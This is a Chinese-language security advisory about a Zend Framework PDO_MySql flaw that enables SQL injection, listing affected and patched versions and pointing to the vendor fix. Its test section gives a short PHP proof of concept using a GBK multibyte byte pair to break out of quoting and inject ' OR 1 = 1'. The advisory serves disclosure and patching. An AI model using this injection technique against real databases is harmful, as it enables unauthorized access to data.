发布日期:2011-05-19
更新日期:2011-05-30受影响系统:
Zend Zend Framework 1.11.4
Zend Zend Framework 1.11.3
Zend Zend Framework 1.10.4
Zend Zend Framework 1.10.3
Zend Zend Framework 1.10.2
不受影响系统:
Zend Zend Framework 1.11.6
Zend Zend Framework 1.10.9
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 47919Zend Framework (ZF) 是一个开放源代码的 PHP5 开发框架,可用于来开发 web 程序和服务。Zend Framework在实现上存在"PDO_MySql"安全限制绕过漏洞,远程攻击者可利用此漏洞绕过某些安全限制,利用SQL注入漏洞。<*来源:Anthony Ferrara
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!$dsn = "mysql:dbname=INFORMATION_SCHEMA;host=127.0.0.1;charset=GBK";
$pdo = new PDO($dsn, $user, $pass);
$pdo->exec("SET NAMES GBK");
$string = chr(0xbf) . chr(0x27) . " OR 1 = 1; /*";
$sql = "SELECT TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_NAME LIKE ".$pdo->quote($string).";";
$stmt = $pdo->query($sql);
var_dump($stmt->rowCount());建议:
--------------------------------------------------------------------------------
厂商补丁:Zend
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.zend.com/downloadsMozilla Firefox SSL证书验证安全漏洞HP LoadRunner虚拟用户脚本文件远程缓冲区溢出漏洞相关资讯 漏洞 Zend Framework
- Zend Framework HTTP响应分离漏洞( (05/11/2015 14:11:17)
- Zend Framework身份验证绕过漏洞( (10/14/2014 17:18:14)
- Zend Framework “Zend_Db_Adapter (09/23/2014 09:44:52)
| - Zend Framework Session (01/23/2015 17:33:29)
- Zend Framework Sqlsrv驱动程序多 (09/25/2014 16:28:16)
- 快递官网漏洞泄露 1400 万用户信息 (08/12/2014 08:37:42)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在
|
易网时代-编程资源站